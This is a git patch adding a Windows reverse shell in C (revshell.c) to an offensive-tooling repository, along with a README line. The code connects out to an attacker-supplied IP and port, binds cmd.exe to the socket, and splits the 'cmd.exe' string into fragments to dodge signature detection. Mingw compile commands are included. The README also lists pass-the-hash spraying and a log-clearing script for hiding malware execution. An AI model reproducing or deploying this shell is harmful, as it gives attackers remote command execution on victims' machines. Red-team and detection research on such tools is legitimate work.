From d81f92ad28ea84854edab8e45a4c5481b1d9b4c8 Mon Sep 17 00:00:00 2001 From: mgeeky Date: Fri, 28 Jun 2019 13:21:31 +0200 Subject: [PATCH] Simple reverse-shell added. --- windows/README.md | 2 ++ windows/revshell.c | 71 ++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 73 insertions(+) create mode 100644 windows/revshell.c diff --git a/windows/README.md b/windows/README.md index 5011717..a241810 100644 --- a/windows/README.md +++ b/windows/README.md @@ -22,6 +22,8 @@ - **`pth-carpet.py`** - Pass-The-Hash Carpet Bombing utility - trying every provided hash against every specified machine. ([gist](https://gist.github.com/mgeeky/3018bf3643f80798bde75c17571a38a9)) +- **`revshell.c`** - Utterly simple reverse-shell, ready to be compiled by `mingw-w64` on Kali. No security features attached, completely not OPSEC-safe. + - **`Simulate-DNSTunnel.ps1`** - Performs DNS Tunnelling simulation for purpose of triggering installed Network IPS and IDS systems, generating SIEM offenses and picking up Blue Teams. - **`win-clean-logs.bat`** - Batch script to hide malware execution from Windows box. Source: Mandiant M-Trends 2017. ([gist](https://gist.github.com/mgeeky/3561be7e697c62f543910851c0a26d00)) diff --git a/windows/revshell.c b/windows/revshell.c new file mode 100644 index 0000000..c9606a5 --- /dev/null +++ b/windows/revshell.c @@ -0,0 +1,71 @@ +/* + * Shamefully simple reverse shell, totally not OPSEC-safe, proving extremely + * low programming skills. Coded up in couple of minutes. + * + * Compilation: + * - x64 + * $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32 + * - x86 + * $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32 + * + * Usage: + * cmd> revshell & + * + * Where: + * - ip - remote attacker's server IP + * - port - remote attacker's server PORT +**/ + +#define WIN32_LEAN_AND_MEAN +#include +#include + +#ifdef _MSC_VER +# pragma comment(lib, "ws2_32") +#endif + +int main(int argc, char *argv[]) +{ + WSADATA wsaData; + SOCKET wsock; + struct sockaddr_in sin; + char saddr[16]; + + if (argc < 3) + { + return 0; + } + + const char *hostname = argv[1]; + unsigned int port = atoi(argv[2]); + + WSAStartup(MAKEWORD(2,2), &wsaData); + wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); + + struct hostent *host = gethostbyname(hostname); + strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr))); + + sin.sin_family = AF_INET; + sin.sin_port = htons(port); + sin.sin_addr.s_addr = inet_addr(saddr); + + WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL); + if (WSAGetLastError() == 0) + { + STARTUPINFO sinfo = {0}; + PROCESS_INFORMATION procinfo = {0}; + + sinfo.cb = sizeof(sinfo); + sinfo.dwFlags = STARTF_USESTDHANDLES; + sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock; + + char *cmd[4] = { "cm", "d.e", "x", "e" }; + char command[8] = ""; + snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]); + + CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo); + } + + return 0; +} +